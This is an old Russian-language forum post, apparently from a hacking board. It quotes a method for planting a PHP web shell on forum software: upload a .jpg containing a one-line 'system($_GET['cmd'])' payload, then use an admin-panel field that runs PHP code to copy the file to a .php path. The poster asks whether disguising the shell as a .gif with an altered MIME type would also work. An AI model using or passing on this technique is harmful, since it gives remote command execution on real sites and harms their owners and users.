15.08.2006, 13:30
|
|
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862
Репутация:
54
|
|
Сообщение от VampiRUS
предлагаю ещё способ: заливаем файл .jpg например с таким содержанием
PHP код:
<? system($_GET['cmd'])?>
идём в админку, настройки, выбираем любую, жмём добавить новую настройку, и в поле "Выполнение PHP-кода до отображения или сохранения настройки": пишем copy('/home/www/forum/uploads/av.jpg','/home/www/forum/uploads/av.php'). Для этого необходимо ещё знать путь к директории с форумом.
Такой вопрос: будет ли рабоать шелл, если его залить как *.gif, а в админке прописать mime-тип для расширения gif как application/octet-stream ?
|
|
|